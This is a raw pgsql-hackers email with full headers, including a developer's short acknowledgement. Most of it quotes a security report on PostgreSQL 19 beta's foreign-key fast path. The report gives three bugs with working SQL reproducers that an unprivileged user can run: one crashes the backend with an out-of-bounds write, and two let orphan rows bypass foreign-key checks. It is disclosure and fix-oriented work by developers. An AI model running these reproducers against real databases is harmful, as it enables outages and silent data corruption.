Received: from malur.postgresql.org ([217.196.149.56]) by arkaria.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wVn6z-002C24-03 for pgsql-hackers@arkaria.postgresql.org; Sat, 06 Jun 2026 09:14:37 +0000 Received: from localhost ([127.0.0.1] helo=malur.postgresql.org) by malur.postgresql.org with esmtp (Exim 4.96) (envelope-from ) id 1wVn5x-00FlxF-1n for pgsql-hackers@arkaria.postgresql.org; Sat, 06 Jun 2026 09:13:33 +0000 Received: from magus.postgresql.org ([2a02:c0:301:0:ffff::29]) by malur.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wVn5x-00Flx5-09 for pgsql-hackers@lists.postgresql.org; Sat, 06 Jun 2026 09:13:33 +0000 Received: from mail-pf1-x431.google.com ([2607:f8b0:4864:20::431]) by magus.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (Exim 4.98.2) (envelope-from ) id 1wVn5u-00000001ZH1-1IV4 for pgsql-hackers@postgresql.org; Sat, 06 Jun 2026 09:13:32 +0000 Received: by mail-pf1-x431.google.com with SMTP id d2e1a72fcca58-842338c18e0so1968067b3a.1 for ; Sat, 06 Jun 2026 02:13:28 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1780737207; cv=none; d=google.com; s=arc-20240605; b=kME+cBofOZ2xQ4PFOj6OrhDwqTARHB3pXAolCAMdK5flToqORN5jTXsFg9yRgxDSZl 0FBgOZAsGIxw4IWjovDrkGfsT8T8AT73wtp+Yo+DGtRnoItpbiyVhQSaac+suwSUl+N4 tLAdRXoSjdUCTb2rOZwa7fHk7N4M8+dCzqARIQA5+OX7Sgf/5YaB/E8Em7+S/4LHxsy5 5mJZL7hxKXsn9f2FrfOtRh5+Tfgn74+4s41S5ei3yzr1yMyMw1ald5TuzRNURPBsLcIU TMGMlKOxZ28d6fDaa7KevUsm7zAwt+QHEAUd89sFnrRyKNoUbly5new+PIRM8M9hJDjf 7q+Q== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20240605; h=cc:to:subject:message-id:date:from:in-reply-to:references :mime-version:dkim-signature; bh=oIGNAUwA1nEGq+JZEXJSX/SfGjPcH09lKagNmeQb00E=; fh=c/W7hNCZjLN+L3G/W6nbCHoildWV8Hk0H9foDtM+dPc=; b=DKsW0ar9tF5YIEbdW0+70rZ+8zRJ68p0pvFKPD5H174DdWp0dDaCFYj97HyyzHCWA0 CYzIPvhpi/Fe0HqHjxMogurG+iL2W5jBcau5BQd8BhhC+AWaRlC4qLmFQFZ93jV07PKi I7EBp/wExULYeHJhk716Z9ZGZ1dmqcB3Rhkvm0DpCBmkbIhIf9RK1qSWCT4WIbIcJnlL 8hgi5z6PqRGxxRVHKCBW0NMVNW8pCYqUMZHuvHgXgGscUMqoFeHrm19Xrc15wvsfqzlv jCvv/nCitScb4SfOiAv/A6Hj742qVW33PA0Aw0i+gbYjw0Y5XP76u6qDFdl2OV8gVf7a AW4Q==; darn=postgresql.org ARC-Authentication-Results: i=1; mx.google.com; arc=none DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20251104; t=1780737207; x=1781342007; darn=postgresql.org; h=cc:to:subject:message-id:date:from:in-reply-to:references :mime-version:from:to:cc:subject:date:message-id:reply-to; bh=oIGNAUwA1nEGq+JZEXJSX/SfGjPcH09lKagNmeQb00E=; b=lH3QkUdDuwSq4aAKiZ6FmOyf/tbYxVjLFsQGVBsumVSiDhhgY41vJxNeXf9OrJJ2ya Ajb6dkgjWRw5JMXHFWrHspl9f/c8lLMGfJ9/o2O+Z48dVznyrZB1bUGcQOIJVl8Yu6sR QHBkh7zOC6D7eCTk1GApjd41cRT3qbp7FYrJAz6oeTNzmYMwLIpb06+cbwn8rdHYDF0S w8l9lBigPDNsAAskgdQ3BGTsmY7uIXyzwlcLafDKc7XO+NaBorNT1u/8Ra8X4kGlgiIx 7Wbiegf6thoZMRXWBOtl0QjOmb2Xs058qXRwqY+eQNsvFYGWhpUZ4G/oLOgL6Zt9OVSu JchQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1780737207; x=1781342007; h=cc:to:subject:message-id:date:from:in-reply-to:references :mime-version:x-gm-gg:x-gm-message-state:from:to:cc:subject:date :message-id:reply-to; bh=oIGNAUwA1nEGq+JZEXJSX/SfGjPcH09lKagNmeQb00E=; b=AunThJ4UD0k51MMgwfjxhDhK4TcSTiG0kGmF7kJBL7W35m83F1Rtd5YpOTO0s4q9nd NqAsL2HveuihqCcKpmvRaHgvpY13qrAJNZpQwfi8Tz4cdhaN2BMoGzj5S+Nm6bVwVuDX dOvraNBLi7VXesaseKlbumWOr/pCIdTnjz9mEbved1ZkRNO1LdTI1zwhJVYALLb54Kl/ X3/+4KbeCWqjnc+QM8xXn4gsw/R5x3JtDvTaimT8KAj0VDaBiEwYW5pJWPjTXAh6rWAO 0kX6kmBRKKcTaM6FbzcMmieeklIE2lYkrdouJtMjH9lCtp/xyYd0itvspkGM4XPRxKIv tFYw== X-Gm-Message-State: AOJu0YwOW22Zt2yIFl0dabdvAmp1+Tu2qQ643Uzs6/Q2yH92SEBUatPA 2Uoo5WCQ8IVTGTR3rRKtxK487ls6K0DstgC+1gvio+V4wIhecP1K1FAqvwDj8A/OnOBmmyoR1IX +L9gEbHigzxYgShEVgGUZAXV9a5LttN8= X-Gm-Gg: Acq92OFuY41sPx+A2TG5rsrw+vLdR16x6kGeRuiqSAKWwJFBQ2/Y6nuPR2QqvgvYMvX i4yyUQNj3Kj2nu48A+lXGZzBTDCDyhwqDpdXVxYWMdgtSIglNnVxM9TfrCvWELuy8oILOWkfhT6 B8qWySg5TdqH5YIgGMBQpb311CUvz3xOzQmSIrYuZLhiYW3A0wQk0KzYgp9GzaX4vIM+riyg1fQ 48Qz4mnIzPHBVBaVyTeb7CHZhqyAr4EvwZaqdVFi5P6ubSDrIWd6FhFn9fV8ayj2lfeWjpSHZhE 62EdhwMC+ZP8jzYLm8M6irztjN5a8Z44m7sQIRxwJ5DKxeqCYCPZPPyTZf87NgbyVLV889hcMTj v5SLtNPIVbKbylc3cTE/a9nKjTvgzcxs= X-Received: by 2002:a05:6a00:21cf:b0:83a:3135:edbd with SMTP id d2e1a72fcca58-842b0e1e1f7mr7642803b3a.7.1780737206758; Sat, 06 Jun 2026 02:13:26 -0700 (PDT) MIME-Version: 1.0 References: In-Reply-To: From: Amit Langote Date: Sat, 6 Jun 2026 18:13:15 +0900 X-Gm-Features: AVVi8CcFxpcklhoa3usr25E4LsvNpRYZOpbwVpPHQZHOJZpssoqkzX16KkTQwfc Message-ID: Subject: Re: PG19 FK fast path: OOB write and missed FK checks during batched To: Nikolay Samokhvalov Cc: pgsql-hackers mailing list , Andrey Borodin , Kirk Wolak Content-Type: multipart/alternative; boundary="000000000000a5b34906539230fb" List-Id: List-Help: List-Subscribe: List-Post: List-Owner: List-Archive: Archived-At: Precedence: bulk --000000000000a5b34906539230fb Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov wrote: > Hi hackers, > > > The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs > user-defined code in the middle of a deferred batch flush, which yields a= t > least three defects reachable by an unprivileged table owner. Present in > master and verified inREL_19_BETA1. > > > I identified these issues during recent security research with LLMs. Whil= e > they have clear security implications (OOB write, integrity bypass), > reporting them here because they are isolated to 19beta1, absent in PG18 > and earlier; I don't have patches, only reproducibility. > > > Mechanism: > > > For an INSERT/UPDATE on the referencing side the fast path buffers rows > in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint > OID) and probes the PK index in groups, flushing when a > > per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the > > trigger-firing pass ends (ri_FastPathEndBatch, an > AfterTriggerBatchCallback). For a cross-type FK the flush calls the > column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line > 3069) and the equality operator -- arbitrary user code, mid-flush. Line > numbers below are from a REL_19_BETA1 build (commit 4b0bf07). > > > Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role= creates > a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQ= L > function, which ri_HashCompareOp wires into the fast path's cast > > slot. Below uses a composite type. Default btree opclass, ordinary single= -column > FK, no GUC (fast path is unconditional for non-partitioned, non-temporal > FKs, per ri_fastpath_is_applicable). > > > > 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry > > > The write precedes the bound check, and batch_count is reset to 0 only at= end > of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a ful= l-batch > flush: > > > fpentry->batch[fpentry->batch_count] =3D ExecCopySlotHeapTuple(newslo= t); > > fpentry->batch_count++; > > if (fpentry->batch_count >=3D RI_FASTPATH_BATCH_SIZE) > > ri_FastPathBatchFlush(fpentry, fk_rel, riinfo); > > > There is no re-entrancy guard and ri_FastPathGetEntry returns the same en= try, > so user code that does DML on the same table during a full-batch flush > re-enters with batch_count =3D=3D 64 and writes batch[64], one past the > > array, overwriting the adjacent batch_count field (struct layout, lines > 250-251). A single re-entrant row only stomps batch_count, which is then = reset > to 0 before reuse; the crash manifests once the re-entrant insert is > > itself large enough to fill and flush a batch, so the stomped batch_count > is used as an array index (batch[garbage]) and as nvals in memset(matched= , > 0, nvals * sizeof(bool)) (line 3054). > > > Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0; > under -O2 the out-of-bounds write is of undefined effect): > > > create table parent(id int primary key); > > insert into parent select g from generate_series(1,2000) g; > > create type vch as (v int); > > create function vcast(vch) returns int language plpgsql as $$ > > begin > > if $1.v =3D 64 then > > insert into child select row(g)::vch from > generate_series(1001,1064) g; > > end if; > > return $1.v; > > end$$; > > create cast (vch as int) with function vcast(vch) as implicit; > > create table child(a vch); > > alter table child add constraint child_fkey > > foreign key (a) references parent(id); > > insert into child select row(g)::vch from generate_series(1,64) g; -= - > crash > > -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count > holding a > > -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote > > -- batch_count; backend SIGSEGVs and the cluster restarts. > > > > 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort > > > On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache: > > > ri_fastpath_cache =3D NULL; > > ri_fastpath_callback_registered =3D false; > > > But batch[] holds outstanding rows of the enclosing transaction, not the = aborting > subxact. An internal subxact abort during after-trigger firing (PL/pgSQL > BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks > never run and orphans commit behind a constraint that still reports itsel= f > valid. No cast needed: > > > create table pk(id int primary key); > > create table fk(a int, tag text); > > insert into pk select g from generate_series(1,10) g; > > alter table fk add constraint fk_a_fkey foreign key (a) references > pk(id); > > create function abort_subxact() returns trigger language plpgsql as $= $ > > begin > > if NEW.tag =3D 'boom' then > > begin perform 1/0; exception when others then null; end; > > end if; > > return NEW; > > end$$; > > create trigger fk_after after insert on fk > > for each row execute function abort_subxact(); > > insert into fk values > (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok'); > > -- INSERT 0 5, no error > > select f.a from fk f left join pk p on f.a=3Dp.id where p.id is null; > > -- a > > -- ----- > > -- 999 > > -- 0 (orphans) > > > -- the constraint still reports itself valid, and re-validation passe= s > > -- while the orphans remain: > > select convalidated from pg_constraint where conname =3D 'fk_a_fkey'; > > -- convalidated > > -- -------------- > > -- t > > alter table fk validate constraint fk_a_fkey; > > -- ALTER TABLE (succeeds; does not re-scan committed rows) > > select f.a from fk f left join pk p on f.a=3Dp.id where p.id is null; > > -- 999, 0 (orphans still present) > > > Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY= DEFERRED) > all behave correctly (FK violation raised, no orphans). The whole stateme= nt's > buffered batch is discarded, not just the aborting row's check. The abort > path also emits "WARNING: resource was not closed" (relation / > > index / TupleDesc), a resource leak consistent with the missing flush. > > > > 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check > > > EndBatch flushes by iterating the cache with hash_seq_search (line 4143).= If > flush-time user code INSERTs into a different fast-path FK table, ri_Fast= PathGetEntry > adds a new cache entry mid-scan; it can land in a bucket hash_seq_search > already passed and is never reached. ri_FastPathTeardown (line 4165) then > hash_destroys the cache (line 4188) without flushing entries that still > have batch_count > 0, so that buffered check is discarded. This survives = a > > per-entry guard for [1] (different entry, not a re-entry of the busy one)= : > > > create table parent(id int primary key); > > insert into parent select g from generate_series(1,64) g; > > create table child2(a int); > > alter table child2 add constraint child2_fkey > > foreign key (a) references parent(id); > > create type vch as (v int); > > create function vcast(vch) returns int language plpgsql as $$ > > begin > > if $1.v =3D 1 then > > insert into child2 values (999999); -- orphan into a > *different* FK > > end if; > > return $1.v; > > end$$; > > create cast (vch as int) with function vcast(vch) as implicit; > > create table child(a vch); > > alter table child add constraint child_fkey > > foreign key (a) references parent(id); > > insert into child values (row(1)::vch); -- flushed at > ri_FastPathEndBatch > > select a from child2 where a not in (select id from parent); -- =3D> > 999999 > > -- control: INSERT INTO child2 VALUES (999999); -- correctly raises > FK error > > > > Root cause / thoughts: > > > All three stem from invoking user cast/operator code inside a deferred ba= tch > flush: while a per-entry batch is half-updated [1], while a cache-wide ha= sh_seq_search > is in progress and teardown drops non-empty entries [3], and against a > subxact-abort invalidation that cannot tell parent-xact rows from aborted= -subxact > rows [2]. > > > - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a "flu= shing" > flag to RI_FastPathEntry, rejecting re-entrant modification of a busy > entry (a nested per-row probe is unsafe: the flush may hold PK-index buff= er > locks). > > - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count > > 0, and/or flush non-empty entries in ri_FastPathTeardown before > hash_destroy. > > - [2] Do not discard outstanding parent-xact rows on > SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush > immediate-constraint batches subxact boundaries. > > - Unifying: a global "in fast-path flush" guard routing any re-entrant FK= check > to the immediate per-row path, and reconsidering running user code mid-fl= ush > at all. > > > Nik > Thanks for the detailed report and reproducers. I=E2=80=99ve started lookin= g into this. - thanks, Amit > --000000000000a5b34906539230fb Content-Type: text/html; charset="UTF-8" Content-Transfer-Encoding: quoted-printable
On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <nik@postgres.ai> wrote:

Hi hackers,


The new FK existence-c= heck fast path in ri_triggers.c (ri_FastPath*) runs user-defined code in th= e middle of a deferred batch flush, which yields at least three defects rea= chable by an unprivileged table owner. Present in master and verified inREL= _19_BETA1.


I i= dentified these issues during recent security research with LLMs. While the= y have=C2=A0clear security implications (OO= B write, integrity bypass), reporting=C2=A0= them here because they are isolated to=C2=A019beta1, absent in PG18 and earlier; I don't have patches, only reproducibility.


Mechanism:

<= span style=3D"border-color:rgb(255,255,255)">

For an INSERT/UPDATE on the referencing side the = fast path=C2=A0buffers rows in a transactio= n-lived cache (ri_fastpath_cache, keyed by=C2=A0pg_constraint OID) and probes the PK index in groups, flushing when a<= /span>

per-constra= int buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the

trigger-firing pass ends (r= i_FastPathEndBatch, an AfterTriggerBatchCallback).=C2=A0For a cross-type FK the flush calls the column's cast fun= ction=C2=A0(ri_FastPathFlushArray, the Func= tionCall3 at line 3069) and the equality=C2=A0operator -- arbitrary user code, mid-flush.=C2=A0=C2=A0Line numbers below are from = a=C2=A0REL_19_BETA1 build (commit 4b0bf07).


Unprivileged vehicle (defects 1 and 3).=C2=A0=C2=A0No superuser, no contrib: a role=C2=A0creates a type it owns and an IMPLICIT cast from it t= o the PK type with a=C2=A0PL/pgSQL function= , which ri_HashCompareOp wires into the fast path's cast

slot.=C2=A0Below uses a composite type= .=C2=A0Default btree opclass, ordinary=C2=A0single-column FK, no GUC (fast path is unconditional for non-partitioned,= =C2=A0non-temporal FKs, per ri_fastpath_is_= applicable).


=


1) ri_FastPathBatchAdd (line 2859= ): out-of-bounds write on re-entry


The write precedes the bound check, and batch_count is reset to 0 o= nly at=C2=A0end of flush (ri_FastPathBatchF= lush, line 2971), so it is 64 throughout a=C2=A0full-batch flush:


=C2= =A0 =C2=A0=C2=A0fpentry->batch[fpentry-&= gt;batch_count] =3D ExecCopySlotHeapTuple(newslot);

=C2=A0 =C2=A0=C2=A0fpentry->batch_count++;

=C2=A0 =C2=A0=C2=A0if (fpentry->b= atch_count >=3D RI_FASTPATH_BATCH_SIZE)

=C2=A0 =C2=A0 =C2=A0 =C2=A0=C2= =A0ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);


There is no re-entrancy guard and ri_FastP= athGetEntry returns the same=C2=A0entry, so= user code that does DML on the same table during a full-batch=C2=A0= flush re-enters with batch_count =3D=3D 64 and wri= tes batch[64], one past the

array, overwriting the adjacent batch_count field (struct layout, lines= =C2=A0250-251).=C2=A0A single re-entrant row only stomps batch_count, which is then=C2= =A0reset to 0 before reuse; the crash manif= ests once the re-entrant insert is

itself large enough to fill and flush a batch, so the stomped ba= tch_count is=C2=A0used as an array index (b= atch[garbage]) and as nvals in memset(match= ed, 0, nvals * sizeof(bool)) (line 3054).


Reproduction (non-superuser; reliable SIGSEGV on --enable-ca= ssert -O0; under -O2=C2=A0the out-of-bounds= write is of undefined effect):

<= p style=3D"margin:0px;line-height:normal;font-size-adjust:none;font-kerning= :auto;font-variant-alternates:normal;font-variant-ligatures:normal;font-var= iant-numeric:normal;font-variant-east-asian:normal;font-feature-settings:no= rmal;min-height:21px;background-color:rgba(0,0,0,0);border-color:rgb(255,25= 5,255);color:rgb(255,255,255)">

=C2=A0 =C2=A0= =C2=A0create table parent(id int primary key);

=C2=A0 =C2=A0=C2=A0<= /span>insert into parent select g from generate_series(1,2000) g;

=C2=A0 =C2=A0=C2=A0create type vch as (v int);

=C2=A0 =C2=A0=C2=A0cr= eate function vcast(vch) returns int language plpgsql as $$

=C2=A0 =C2=A0= =C2=A0begin

=C2= =A0 =C2=A0 =C2=A0=C2=A0if $1.v =3D 64 then<= /span>

=C2=A0 =C2=A0 =C2=A0 =C2= =A0=C2=A0insert into child select row(g)::v= ch from generate_series(1001,1064) g;

=C2=A0 =C2=A0 =C2=A0=C2=A0end= if;

=C2=A0 =C2=A0 =C2= =A0=C2=A0return $1.v;

=C2=A0 =C2=A0=C2=A0<= /span>end$$;

=C2=A0 =C2= =A0=C2=A0create cast (vch as int) with func= tion vcast(vch) as implicit;

=C2=A0 =C2=A0=C2=A0create table child(= a vch);

=C2=A0 =C2=A0=C2=A0alter table child add constraint child_f= key

=C2=A0 =C2=A0 =C2=A0= =C2=A0foreign key (a) references parent(id)= ;

=C2=A0 =C2=A0=C2=A0insert into child select row(g)::vch from gene= rate_series(1,64) g;=C2=A0=C2=A0-- crash

=C2=A0 =C2=A0=C2=A0-- gdb: crash at ri_FastPathBatchAdd line 2866 w= ith batch_count holding a

=C2=A0-- stomped HeapTuple p= ointer's low bits, i.e. batch[64] overwrote

<= span style=3D"background-color:rgba(0,0,0,0);border-color:rgb(255,255,255);= color:rgb(255,255,255)">=C2=A0 =C2=A0=C2=A0= -- batch_count; backend SIGSEGVs and the cluster restarts.



2) ri_FastPathSubXactCallback (line 4208): ba= tch dropped on subxact abort



=

=C2=A0 =C2=A0=C2=A0ri_fastpath_cache =3D NULL;

=C2=A0 =C2=A0=C2=A0ri_= fastpath_callback_registered =3D false;


But batch[] holds outstanding rows of the enclosi= ng transaction, not the=C2=A0aborting subxa= ct.=C2=A0An= internal subxact abort during after-trigger firing=C2=A0(PL/pgSQL BEGIN ... EXCEPTION) drops the buffered rows unflus= hed; their FK=C2=A0checks never run and orp= hans commit behind a constraint that still reports=C2=A0itself valid= .=C2=A0No cast needed:


=C2=A0 =C2= =A0=C2=A0create table pk(id int primary key= );

=C2=A0 =C2=A0=C2=A0create table fk(a int, tag text);

<= p style=3D"margin:0px;line-height:normal;font-size-adjust:none;font-kerning= :auto;font-variant-alternates:normal;font-variant-ligatures:normal;font-var= iant-numeric:normal;font-variant-east-asian:normal;font-feature-settings:no= rmal;background-color:rgba(0,0,0,0);border-color:rgb(255,255,255);color:rgb= (255,255,255)">=C2=A0 =C2=A0=C2=A0insert into pk select g from generate_series(1,10) g;

=C2=A0 =C2=A0=C2=A0alter table fk add constraint fk_a_fkey foreign key (= a) references pk(id);

= =C2=A0 =C2=A0=C2=A0create function abort_su= bxact() returns trigger language plpgsql as $$

=C2=A0 =C2=A0=C2=A0b= egin

=C2=A0 =C2=A0 =C2= =A0=C2=A0if NEW.tag =3D 'boom' then=

=C2=A0 =C2=A0 =C2=A0 = =C2=A0=C2=A0begin perform 1/0; exception wh= en others then null; end;

=C2=A0end if;<= /p>

=C2=A0 =C2=A0 =C2=A0=C2=A0return NEW;

=C2=A0 =C2=A0=C2=A0end$$;

=C2=A0 =C2=A0=C2=A0create trigger fk_after after insert on fk

=C2=A0 =C2=A0 =C2=A0=C2=A0for each row execute function abort_subxact();=

=C2=A0 =C2=A0=C2=A0insert into fk values (999,'bad'),(0,&#= 39;boom'),(1,'ok'),(2,'ok'),(3,'ok');

=C2=A0 =C2=A0=C2=A0-- INSERT 0 5, no error

=C2=A0 =C2=A0=C2=A0select= f.a from fk f left join pk p on f.a=3Dp.id where p.id is null;

=C2=A0 =C2=A0=C2=A0--=C2= =A0=C2=A0a

=C2=A0 =C2=A0=C2=A0-- --= ---

=C2=A0 =C2=A0=C2=A0-- 999

=C2=A0 =C2=A0=C2=A0--=C2=A0= =C2=A0=C2=A00=C2=A0=C2=A0=C2=A0(orphans)


=C2=A0 =C2=A0=C2=A0-- the constraint sti= ll reports itself valid, and re-validation passes

=C2=A0 =C2=A0=C2=A0-- while the orphans remain:

=C2=A0 =C2=A0=C2=A0select convalidat= ed from pg_constraint where conname =3D 'fk_a_fkey';

=C2=A0 =C2=A0= =C2=A0-- convalidated

=C2=A0 =C2=A0=C2=A0-- --------------

=C2=A0 =C2=A0=C2=A0-- t

=C2=A0 =C2=A0=C2=A0alter table fk v= alidate constraint fk_a_fkey;

=C2=A0 =C2=A0=C2=A0-- ALTER TABLE=C2= =A0=C2=A0=C2=A0(succeeds; does not re-scan = committed rows)

=C2=A0 = =C2=A0=C2=A0select f.a from fk f left join = pk p on f.a=3Dp= .id where p= .id is null;

=C2=A0 = =C2=A0=C2=A0-- 999, 0=C2=A0=C2=A0(orphans still present)


Controls (no EXCEPTION; between-statement SAVEPOINT; DEF= ERRABLE INITIALLY=C2=A0DEFERRED) all behave= correctly (FK violation raised, no orphans).=C2=A0The whole=C2=A0statement's buff= ered batch is discarded, not just the aborting row's check.=C2=A0The abort path also emits "WARNING: resource= was not closed" (relation /

index / TupleDesc), a resource leak consistent with the missing f= lush.



3) ri_FastPathEndBatch (= line 4133): cross-table re-entry drops a check


EndBatch flushes by iterating the cache = with hash_seq_search (line 4143).=C2=A0If f= lush-time user code INSERTs into a different fast-path FK table,=C2=A0ri_FastPathGetEntry adds a new cache entry mid-s= can; it can land in a bucket=C2=A0hash_seq_= search already passed and is never reached.=C2=A0ri_FastPathTeardown=C2=A0(line 4165) then hash_destroys the cache (line 4188) without flush= ing entries=C2=A0that = still have batch_count > 0, so that buffered check is discarded.<= span style=3D"border-color:rgb(255,255,255)">=C2=A0This=C2=A0survives a

per-entry guard for [1] (different entry, not a re-entry of the busy on= e):


=C2=A0 =C2=A0=C2=A0create table parent(id int primary key);=

=C2=A0 =C2=A0=C2=A0insert into parent select g from generate_series(1,64)= g;

=C2=A0 =C2=A0=C2=A0create table child2(a int);

=C2=A0 =C2=A0= =C2=A0alter table child2 add constraint child2_fkey

=C2=A0 =C2=A0 =C2=A0=C2=A0foreign key (a) references parent(id);

=C2=A0 =C2=A0=C2= =A0create type vch as (v int);

=C2=A0 =C2=A0=C2=A0create fun= ction vcast(vch) returns int language plpgsql as $$

=C2=A0 =C2=A0=C2=A0begin

=C2=A0 =C2=A0 = =C2=A0=C2=A0if $1.v =3D 1 then

=C2=A0 =C2=A0 =C2=A0 =C2=A0=C2=A0insert into child2 values (999999);=C2=A0=C2= =A0=C2=A0-- orphan into a *different* FK

=C2=A0 =C2=A0 =C2=A0=C2=A0end if;

=C2=A0 =C2=A0 =C2=A0=C2=A0r= eturn $1.v;

=C2=A0 =C2= =A0=C2=A0end$$;

<= span style=3D"background-color:rgba(0,0,0,0);border-color:rgb(255,255,255);= color:rgb(255,255,255)">=C2=A0 =C2=A0=C2=A0= create cast (vch as int) with function vcast(vch) as implicit;

=C2=A0 =C2=A0=C2=A0 =C2=A0=C2=A0alter = table child add constraint child_fkey

=C2=A0 =C2=A0 =C2=A0=C2=A0for= eign key (a) references parent(id);

=C2=A0 =C2=A0=C2=A0insert int= o child values (row(1)::vch);=C2=A0 =C2=A0=C2=A0-- flushed at ri_FastPathEndBatch

=C2=A0 =C2=A0=C2=A0select a = from child2 where a not in (select id from parent);=C2=A0=C2=A0-- =3D> 999999

=C2=A0 =C2=A0=C2=A0-- control= : INSERT INTO child2 VALUES (999999); -- correctly raises FK error


<= p style=3D"margin:0px;line-height:normal;font-size-adjust:none;font-kerning= :auto;font-variant-alternates:normal;font-variant-ligatures:normal;font-var= iant-numeric:normal;font-variant-east-asian:normal;font-feature-settings:no= rmal;min-height:21px;background-color:rgba(0,0,0,0);border-color:rgb(255,25= 5,255);color:rgb(255,255,255)">

Root cause / thoughts:

All three stem from invoking = user cast/operator code inside a deferred=C2=A0batch flush: while a per-entry batch is half-updated [1], while a cache= -wide=C2=A0hash_seq_search is in progress a= nd teardown drops non-empty entries [3], and=C2=A0against a subxact-abort invalidation that cannot tell parent-xact ro= ws from=C2=A0aborted-subxact rows [2].


<= /p>

- [1] Bound-check before the wr= ite in ri_FastPathBatchAdd, and add a=C2=A0= "flushing" flag to RI_FastPathEntry, rejecting re-entrant modific= ation of=C2=A0a busy entry (a nested per-ro= w probe is unsafe: the flush may hold PK-index=C2=A0buffer locks).

= - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count >= 0,=C2=A0and/or flush non-empty entries in = ri_FastPathTeardown before hash_destroy.

- [2] Do not discard outstanding parent-xact rows on SUBXA= CT_EVENT_ABORT_SUB;=C2=A0track the bufferin= g subxact, or flush immediate-constraint batches=C2=A0subxact boundaries.

- Unifying: a global "in fast-path flush" guard routing an= y re-entrant FK=C2=A0check to the immediate= per-row path, and reconsidering running user code=C2=A0mid-flush at all.

<= span style=3D"background-color:rgba(0,0,0,0);border-color:rgb(255,255,255);= color:rgb(255,255,255)">

Nik


Thanks for the detailed report and reproducers. I=E2=80=99ve started loo= king into this.


- thanks, Amit

--000000000000a5b34906539230fb--